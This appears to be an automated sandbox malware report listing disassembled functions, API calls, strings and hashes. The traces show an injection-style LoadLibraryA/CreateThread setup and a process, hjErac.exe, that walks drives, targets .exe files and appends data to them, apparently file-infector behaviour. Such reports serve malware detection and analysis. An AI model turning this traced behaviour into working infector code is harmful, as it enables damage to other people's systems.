Instruction ID: 4c890cd2064fd610405ff1f6fdfe31d0f9460082d34f85d530b786582c6148e8
Opcode Fuzzy Hash: d58ed1054bcb28fccb2b0829b4d1291259a043aa1f8010e933985be3cfa49286
Instruction Fuzzy Hash: 08312DB5D4126C9BDB21DF65D9897CCBBB8BF08300F1041A9E50DAB290EB745B898F05

Function 003E1670 Relevance: 1.7, APIs: 1, Instructions: 175COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000800,00000000,00000000,?,00000000), ref: 003E1767

Memory Dump Source

Source File: 00000000.00000002.4133837283.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000000.00000002.4133813463.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133855820.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133873490.00000000003E6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133892481.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133912924.00000000003E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133935444.00000000003EA000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3e0000_ib.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: d9c2f9fedb2385ef7be29012302ce5c2b7c3172ec7b04b6c13113a997043bd8b
Instruction ID: 102b8593b9c9c748487353337ae3f26a4d2cde15a92d3b621c1ad3f7ec1909ce
Opcode Fuzzy Hash: d9c2f9fedb2385ef7be29012302ce5c2b7c3172ec7b04b6c13113a997043bd8b
Instruction Fuzzy Hash: 48716971504696DFD326CF26C9D1B62BBE9FB56700F2487A9D4568F6E9D330E900CB80

Function 003E3444 Relevance: 1.6, APIs: 1, Instructions: 147COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 003E345A

Memory Dump Source

Source File: 00000000.00000002.4133837283.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000000.00000002.4133813463.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133855820.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133873490.00000000003E6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133892481.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133912924.00000000003E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133935444.00000000003EA000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3e0000_ib.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 2220a4ba3a89479e9bbd0cb47d24552195e31f883cd9ef4eeb5350247ffa51f5
Instruction ID: d0d2a17deda6a04e3ef3033654dedaf820bb578dbd7471d7bd74783127029482
Opcode Fuzzy Hash: 2220a4ba3a89479e9bbd0cb47d24552195e31f883cd9ef4eeb5350247ffa51f5
Instruction Fuzzy Hash: AE519EB19002A59BDB26CF56D8CA7AABBF8FB54350F11862AC416EB3D0D7749E00CF50

Function 003E3308 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00003314,003E2B33), ref: 003E330D

Memory Dump Source

Source File: 00000000.00000002.4133837283.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000000.00000002.4133813463.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133855820.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133873490.00000000003E6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133892481.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133912924.00000000003E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133935444.00000000003EA000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3e0000_ib.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: fc376c9935ad515a5f96d3310dc54b17c394078690b9acf9429af32d1db57df8
Instruction ID: 470c7b37fe9b051e8f3221eb4395661ff1330d3fae478e336509e04f797f6bac
Opcode Fuzzy Hash: fc376c9935ad515a5f96d3310dc54b17c394078690b9acf9429af32d1db57df8
Instruction Fuzzy Hash:

Function 003ECB71 Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4133935444.00000000003EA000.00000080.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000000.00000002.4133813463.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133837283.00000000003E1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133855820.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133873490.00000000003E6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133892481.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133912924.00000000003E9000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3e0000_ib.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1dc641a110ca9df19878faaf737841f865a9904d38a7bb4b8f4adfe9b60eb3df
Instruction ID: 897b14cf30d90aa83cf81123e2e9c6abf5a266ac9eb7f4e3774078465508bdb8
Opcode Fuzzy Hash: 1dc641a110ca9df19878faaf737841f865a9904d38a7bb4b8f4adfe9b60eb3df
Instruction Fuzzy Hash: 82819631624B518FC715CF29C8906AABBE2EFD5314F148A2DD0EA87791D734E84ACB44

Function 003E2A7B Relevance: 12.1, APIs: 8, Instructions: 56
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_set_app_type.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000001), ref: 003E2A7E
_set_fmode.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001), ref: 003E2A89
__p__commode.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001), ref: 003E2A95
__RTC_Initialize.LIBCMT ref: 003E2AAD
_configure_narrow_argv.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,003E339E), ref: 003E2AC2

Part of subcall function 003E3138: InitializeSListHead.KERNEL32(003E64E0,003E2AD2), ref: 003E313D

__setusermatherr.API-MS-WIN-CRT-MATH-L1-1-0(Function_00002070), ref: 003E2AE0
_configthreadlocale.API-MS-WIN-CRT-LOCALE-L1-1-0(00000000), ref: 003E2AFB
_initialize_narrow_environment.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 003E2B0A

Memory Dump Source

Source File: 00000000.00000002.4133837283.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000000.00000002.4133813463.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133855820.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133873490.00000000003E6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133892481.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133912924.00000000003E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133935444.00000000003EA000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3e0000_ib.jbxd

Similarity

API ID: Initialize$HeadList__p__commode__setusermatherr_configthreadlocale_configure_narrow_argv_initialize_narrow_environment_set_app_type_set_fmode
String ID:
API String ID: 1933938900-0
Opcode ID: e1c0faf77b7a3f628e6c2cfb51d8b56275172bfeca53082170fe3bdd7eb1bf7b
Instruction ID: 6bb94364d466cf41d210e9be6dec1ebffb0475adff72cb4bdf4f53542b930e9c
Opcode Fuzzy Hash: e1c0faf77b7a3f628e6c2cfb51d8b56275172bfeca53082170fe3bdd7eb1bf7b
Instruction Fuzzy Hash: A8011454A846F231D8237BFB080FAAF024D4F80B94F450B18B840AF2D3DDAACB4080B7

Function 003E1B10 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 62
libraryloaderthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 003E2A11: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,003E259B,00000010), ref: 003E2A26

GetModuleHandleA.KERNEL32(kernel32.dll), ref: 003E1B90
GetLastError.KERNEL32 ref: 003E1BA3
GetLastError.KERNEL32 ref: 003E1BAD
_printf.MSPDB140-MSVCRT ref: 003E1BB5

Part of subcall function 003E2040: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,00000000,?,003E1BF7,ERRNO %lu,00000000), ref: 003E2049
Part of subcall function 003E2040: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,?,00000000,?,00000000), ref: 003E2064

GetProcAddress.KERNEL32(00000000,LoadLibraryA), ref: 003E1BD5
GetLastError.KERNEL32 ref: 003E1BE4
GetLastError.KERNEL32 ref: 003E1BEA
_printf.MSPDB140-MSVCRT ref: 003E1BF2
memset.VCRUNTIME140(00000000,00000000,00000068,00000068,00000400,00000014), ref: 003E1C64
GetCurrentProcessId.KERNEL32 ref: 003E1C72
CreateThread.KERNELBASE(00000000,00000000,Function_00002510,00000001,00000000,00000000), ref: 003E1D0A

Strings

ERRNO %lu, xrefs: 003E1BB0
kernel32.dll, xrefs: 003E1B8B

Memory Dump Source

Source File: 00000000.00000002.4133837283.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000000.00000002.4133813463.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133855820.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133873490.00000000003E6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133892481.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133912924.00000000003E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133935444.00000000003EA000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3e0000_ib.jbxd

Similarity

API ID: ErrorLast$_printf$AddressCreateCurrentHandleModuleProcProcessThread__acrt_iob_func__stdio_common_vfprintfmallocmemset
String ID: ERRNO %lu$kernel32.dll
API String ID: 2494052705-1154148217
Opcode ID: 8c5e423aea6fb2bbb2583869a93bb339bd01bc4e18be6c53cdee5baece6d585c
Instruction ID: eaaa0bc0fd61a0c5ae070aa6767f2925856ae5cb2a2fc33f9ba98e9afed01be2
Opcode Fuzzy Hash: 8c5e423aea6fb2bbb2583869a93bb339bd01bc4e18be6c53cdee5baece6d585c
Instruction Fuzzy Hash: 7D1127B1900794ABD3219F26DC05B57BBF8EB00720F00472DE8418B7C0E7719D048B91

Function 003E3314 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

__current_exception.VCRUNTIME140 ref: 003E3353
__current_exception_context.VCRUNTIME140 ref: 003E335D
terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 003E3364

Strings

csm, xrefs: 003E331E

Memory Dump Source

Source File: 00000000.00000002.4133837283.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000000.00000002.4133813463.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133855820.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133873490.00000000003E6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133892481.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133912924.00000000003E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133935444.00000000003EA000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3e0000_ib.jbxd

Similarity

API ID: __current_exception__current_exception_contextterminate
String ID: csm
API String ID: 2542180945-1018135373
Opcode ID: b49b954d45b043b1b30b8fe17f1f21450ab2eecb204abfb03c9ac5754cafbfcd
Instruction ID: d5e24f96adb97e821ebd3eb693c9527ed3b83a66e2fa492b7d1c89e274ca400c
Opcode Fuzzy Hash: b49b954d45b043b1b30b8fe17f1f21450ab2eecb204abfb03c9ac5754cafbfcd
Instruction Fuzzy Hash: 9DF0823A0002A0AB8F335F2B948C919F76CEE9173139A4615D489CB690CB20EF56C6D2

Function 003E2A11 Relevance: 6.0, APIs: 4, Instructions: 38COMMON

Download Yara Rule

APIs

_callnewh.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,003E259B,00000010), ref: 003E2A19
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,003E259B,00000010), ref: 003E2A26
_CxxThrowException.VCRUNTIME140(?,003E4BFC), ref: 003E2E1D
_CxxThrowException.VCRUNTIME140(?,003E4C7C), ref: 003E2E3A

Memory Dump Source

Source File: 00000000.00000002.4133837283.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000000.00000002.4133813463.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133855820.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133873490.00000000003E6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133892481.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133912924.00000000003E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4133935444.00000000003EA000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3e0000_ib.jbxd

Similarity

API ID: ExceptionThrow$_callnewhmalloc
String ID:
API String ID: 4113974480-0
Opcode ID: 5dddc52396cc441bb9c44d1e5ab5e680ec1410366edec31dd30beecef9f4045b
Instruction ID: 3aaad65b8a23dc53ce384d11a091a18f0109f53301426d78dee3b8b319914a30
Opcode Fuzzy Hash: 5dddc52396cc441bb9c44d1e5ab5e680ec1410366edec31dd30beecef9f4045b
Instruction Fuzzy Hash: E7F0B4358042ADB78B17FAB7EC4AD9E736C5A00310B504370F924AA5D1EFB0EB5585C0

Analysis Process: hjErac.exePID: 6996, Parent PID: 6876COMMON

Execution Graph

Execution Coverage:	33.5%
Dynamic/Decrypted Code Coverage:	6.7%
Signature Coverage:	17.2%
Total number of Nodes:	285
Total number of Limit Nodes:	11

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00CB29E2 Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 128
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00CB2A02
wsprintfA.USER32 ref: 00CB2A1A
memset.MSVCRT ref: 00CB2A44
lstrlen.KERNEL32(?), ref: 00CB2A54
lstrcpyn.KERNEL32(?,?,-00000001), ref: 00CB2A6C
strrchr.MSVCRT ref: 00CB2A7C
lstrcmpiA.KERNEL32(?,Documents and Settings), ref: 00CB2A9F
lstrlen.KERNEL32(Documents and Settings), ref: 00CB2AAE
memset.MSVCRT ref: 00CB2AC6
memset.MSVCRT ref: 00CB2ADA
FindFirstFileA.KERNEL32(?,?), ref: 00CB2AEF
memset.MSVCRT ref: 00CB2B13
lstrcmpiA.KERNEL32(?,?), ref: 00CB2B42
FindNextFileA.KERNEL32(00000000,?,?,?,?), ref: 00CB2B67
FindClose.KERNEL32(00000000), ref: 00CB2B6E

Strings

C:\, xrefs: 00CB2A2F
%s*, xrefs: 00CB2A14
Documents and Settings, xrefs: 00CB2A8D, 00CB2A92, 00CB2A9A, 00CB2AAD

Memory Dump Source

Source File: 00000002.00000002.1888867701.0000000000CB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000002.00000002.1888855783.0000000000CB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1888879896.0000000000CB3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1888893237.0000000000CB4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1888907189.0000000000CB6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_cb0000_hjErac.jbxd

Similarity

API ID: memset$Find$Filelstrcmpilstrlen$CloseFirstNextlstrcpynstrrchrwsprintf
String ID: %s*$C:\$Documents and Settings
API String ID: 2826467728-110786608
Opcode ID: be36a353cb9deee03c6c014b2a24d1824b1787c1cf4e147cd011448e435c99f8
Instruction ID: eadc9fdceffdfe2c2817102ecde33fa654d0a1dcd365e2589f5d12110b2fc024
Opcode Fuzzy Hash: be36a353cb9deee03c6c014b2a24d1824b1787c1cf4e147cd011448e435c99f8
Instruction Fuzzy Hash: 134175B2404399AFD721EBA0EC49EDFB7ACEF84315F040929F955C3111E635D74897A2

Function 00CB1718 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 65
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemTimeAsFileTime.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\hjErac.exe), ref: 00CB1729
SHSetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,00000003,?,00000008), ref: 00CB174C
SHGetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,?,?,00000001), ref: 00CB177C
__aulldiv.LIBCMT ref: 00CB1796
__aulldiv.LIBCMT ref: 00CB17A8

Strings

C:\Users\user\AppData\Local\Temp\hjErac.exe, xrefs: 00CB1722
Time, xrefs: 00CB173D, 00CB1766
SOFTWARE\GTplus, xrefs: 00CB1742, 00CB176B

Memory Dump Source

Source File: 00000002.00000002.1888867701.0000000000CB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000002.00000002.1888855783.0000000000CB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1888879896.0000000000CB3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1888893237.0000000000CB4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1888907189.0000000000CB6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_cb0000_hjErac.jbxd

Similarity

API ID: TimeValue__aulldiv$FileSystem
String ID: C:\Users\user\AppData\Local\Temp\hjErac.exe$SOFTWARE\GTplus$Time
API String ID: 541852442-2231873215
Opcode ID: 201a708edebfcc0b8b676afa751ae1c830fdca89ac2208d419e696a3bb280662
Instruction ID: 5b7781af394eb0c9b15056ad1086ec939e4ef66bdc4e6fa0c37176f63cc72751
Opcode Fuzzy Hash: 201a708edebfcc0b8b676afa751ae1c830fdca89ac2208d419e696a3bb280662
Instruction Fuzzy Hash: 5F115E72A40249BBEF20DA94CC9AFEF7BBCEB44B14F508125FD10B6181DA759A448B60

Function 00CB2B8C Relevance: 10.6, APIs: 7, Instructions: 74
threadstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00CB2BA6
GetLogicalDriveStringsA.KERNEL32(00000050,?), ref: 00CB2BB4
GetDriveTypeA.KERNEL32(?), ref: 00CB2BD3
CreateThread.KERNEL32(00000000,00000000,Function_00002B7D,?,00000000,00000000), ref: 00CB2BEE
lstrlen.KERNEL32(?), ref: 00CB2BFB
WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 00CB2C16
CreateThread.KERNEL32(00000000,00000000,00CB2845,00000000,00000000,00000000), ref: 00CB2C3A

Memory Dump Source

Source File: 00000002.00000002.1888867701.0000000000CB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000002.00000002.1888855783.0000000000CB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1888879896.0000000000CB3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1888893237.0000000000CB4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1888907189.0000000000CB6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_cb0000_hjErac.jbxd

Similarity

API ID: CreateDriveThread$LogicalMultipleObjectsStringsTypeWaitlstrlenmemset
String ID:
API String ID: 1073171358-0
Opcode ID: 07bfdcbf8559df623c3f89696e7e7b128eb18a23586f3ba7f4752f9948fb351f
Instruction ID: f5a0240dbfba57492147067ccf5e3b277491e532d493a2ede13d1a2e0c314d4c
Opcode Fuzzy Hash: 07bfdcbf8559df623c3f89696e7e7b128eb18a23586f3ba7f4752f9948fb351f
Instruction Fuzzy Hash: EA2190B184019CAFEB20AF64AC84FEE7B6DFF05344F140629F96293161D7349E06CB61

Function 00CB1E6E Relevance: 30.4, APIs: 20, Instructions: 380
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFileAttributesA.KERNEL32(?,00000080,?,00CB32B0,00000164,00CB2986,?), ref: 00CB1EB9
CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 00CB1ECD
SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000002,00000000,00000000), ref: 00CB1EF3
CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00000000,00000000), ref: 00CB1F07
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000400), ref: 00CB1F1D
FlushViewOfFile.KERNEL32(?,00000400,?,00000000,00000000,?,00000000,00000002), ref: 00CB201E
memset.MSVCRT ref: 00CB20D8
memset.MSVCRT ref: 00CB20EA
memcpy.MSVCRT(?,?,00000028,?,?,?,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00CB222D
UnmapViewOfFile.KERNEL32(?,?,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00CB2238
CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00CB224A
SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00CB22C6
SetEndOfFile.KERNEL32(000000FF,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00CB22CB
SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00CB22DD
WriteFile.KERNEL32(000000FF,00CB4008,00000271,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00CB22F7
WriteFile.KERNEL32(000000FF,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00CB230D
CloseHandle.KERNEL32(000000FF,000000FF,00000001,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00CB2322
UnmapViewOfFile.KERNEL32(?,?,00CB32B0,00000164,00CB2986,?), ref: 00CB2340
CloseHandle.KERNEL32(?,?,00CB32B0,00000164,00CB2986,?), ref: 00CB234E
CloseHandle.KERNEL32(000000FF,?,00CB32B0,00000164,00CB2986,?), ref: 00CB2359

Memory Dump Source

Source File: 00000002.00000002.1888867701.0000000000CB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000002.00000002.1888855783.0000000000CB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1888879896.0000000000CB3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1888893237.0000000000CB4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1888907189.0000000000CB6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_cb0000_hjErac.jbxd

Similarity

API ID: File$CloseHandleView$Pointer$CreateUnmapWritememset$AttributesFlushMappingmemcpy
String ID:
API String ID: 3043204753-0
Opcode ID: 501b7d67a1a2e56113b41801fbf0a71b9ff46652cb0bdd20bf46be9d3be5527b
Instruction ID: 10276ef50903ba388e624d9a08d3b82df896fb43dc20c9b1358b6d91e99db79b
Opcode Fuzzy Hash: 501b7d67a1a2e56113b41801fbf0a71b9ff46652cb0bdd20bf46be9d3be5527b
Instruction Fuzzy Hash: 1AF16B71900209EFCB24DFA8DC95AEDBBB5FF08314F50452AE919A7661D730AE81DF50

Function 00CB1973 Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 144
filesleepmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PathFileExistsA.SHLWAPI(00CB4E5C,00000000,C:\Users\user\AppData\Local\Temp\hjErac.exe), ref: 00CB1992
CreateFileA.KERNEL32(00CB4E5C,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 00CB19BA
Sleep.KERNEL32(00000064), ref: 00CB19C6
wsprintfA.USER32 ref: 00CB19EC
CopyFileA.KERNEL32(00CB4E5C,?,00000000), ref: 00CB1A00
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00CB1A1E
GetFileSize.KERNEL32(00CB4E5C,00000000), ref: 00CB1A2C
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00CB1A46
ReadFile.KERNEL32(00CB4E5C,00CB4E60,00000000,?,00000000), ref: 00CB1A65
CloseHandle.KERNEL32(000000FF), ref: 00CB1A90
DeleteFileA.KERNEL32(?), ref: 00CB1AA7
VirtualFree.KERNEL32(00CB4E60,00000000,00008000), ref: 00CB1AC1

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00CB19DB
C:\Users\user\AppData\Local\Temp\hjErac.exe, xrefs: 00CB197C
2, xrefs: 00CB19CF
%s%.8X.data, xrefs: 00CB19E6

Memory Dump Source

Source File: 00000002.00000002.1888867701.0000000000CB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000002.00000002.1888855783.0000000000CB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1888879896.0000000000CB3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1888893237.0000000000CB4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1888907189.0000000000CB6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_cb0000_hjErac.jbxd

Similarity

API ID: File$CreateVirtual$AllocCloseCopyDeleteExistsFreeHandlePathReadSizeSleepwsprintf
String ID: %s%.8X.data$2$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\hjErac.exe
API String ID: 716042067-3613196364
Opcode ID: dfa491d6af305661e258e3b335375ece4f25b608d2a50ba1ad72aa35abac20d9
Instruction ID: 5a769f3bc58740cc208b00ef2be4a66c436937394ab0d575bf5d1072e2d7f5be
Opcode Fuzzy Hash: dfa491d6af305661e258e3b335375ece4f25b608d2a50ba1ad72aa35abac20d9
Instruction Fuzzy Hash: 49514C71901259AFCF109F98DC94AEEBBB8EF04354F544669F925E6190D330AF41DBA0

Function 00CB28B8 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 100
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00CB28D3
wsprintfA.USER32 ref: 00CB28F7
memset.MSVCRT ref: 00CB2925
wsprintfA.USER32 ref: 00CB2940

Part of subcall function 00CB29E2: memset.MSVCRT ref: 00CB2A02
Part of subcall function 00CB29E2: wsprintfA.USER32 ref: 00CB2A1A
Part of subcall function 00CB29E2: memset.MSVCRT ref: 00CB2A44
Part of subcall function 00CB29E2: lstrlen.KERNEL32(?), ref: 00CB2A54
Part of subcall function 00CB29E2: lstrcpyn.KERNEL32(?,?,-00000001), ref: 00CB2A6C
Part of subcall function 00CB29E2: strrchr.MSVCRT ref: 00CB2A7C
Part of subcall function 00CB29E2: lstrcmpiA.KERNEL32(?,Documents and Settings), ref: 00CB2A9F
Part of subcall function 00CB29E2: lstrlen.KERNEL32(Documents and Settings), ref: 00CB2AAE
Part of subcall function 00CB29E2: memset.MSVCRT ref: 00CB2AC6
Part of subcall function 00CB29E2: memset.MSVCRT ref: 00CB2ADA
Part of subcall function 00CB29E2: FindFirstFileA.KERNEL32(?,?), ref: 00CB2AEF
Part of subcall function 00CB29E2: memset.MSVCRT ref: 00CB2B13

strrchr.MSVCRT ref: 00CB2959
lstrcmpiA.KERNEL32(00000001,exe), ref: 00CB2974

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00CB29B3
exe, xrefs: 00CB296D
%s%s, xrefs: 00CB28F1
